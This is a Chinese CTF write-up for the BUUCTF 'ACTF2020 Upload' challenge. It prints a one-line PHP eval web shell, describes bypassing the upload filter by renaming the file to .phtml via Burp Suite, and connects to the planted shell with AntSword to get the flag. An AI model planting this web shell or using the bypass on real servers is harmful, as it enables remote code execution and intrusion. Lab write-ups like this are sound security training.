C/C++教程

[ACTF2020 新生赛]Upload Buuctf

本文主要是介绍[ACTF2020 新生赛]Upload Buuctf,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

文章目录

  • 一、检查源代码
  • 二、文件上传
    • 1、先尝试图片是否能够上传
    • 2、burpsuit抓包、改包
    • 3、使用antsword进行连接,获取flag

一、检查源代码

拿到题目之后,我们首先对页面源代码就行检查,源代码查看之后并没有发现提示或者有用线索,所以我们只能回到文件上传中找答案。

在这里插入图片描述

二、文件上传

1、先尝试图片是否能够上传

首先,我们尝试上传一张图片,发现图片上传成功
在这里插入图片描述

2、burpsuit抓包、改包

注:这是我准备的一句话木马,用来上传图片的
<script language='php'>eval($_POST['a']);</script>
当我们把上传图片后缀名改为PHP是,网页右上角显示了nonono~ Bad file!所以我们把文件后缀名改为phtml上传,文件上传成功。
在这里插入图片描述

3、使用antsword进行连接,获取flag

http://a1fb3d86-c636-4d5a-a7b3-2cfbe8bd466b.node4.buuoj.cn/uplo4d/ad898f6bf1eda88f1ca04a806209e28d.phtml

在这里插入图片描述

flag{bbd330b4-4ce9-4e11-9614-2de4ce5865b0}

注:2021/10/28

这篇关于[ACTF2020 新生赛]Upload Buuctf的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
栏目导航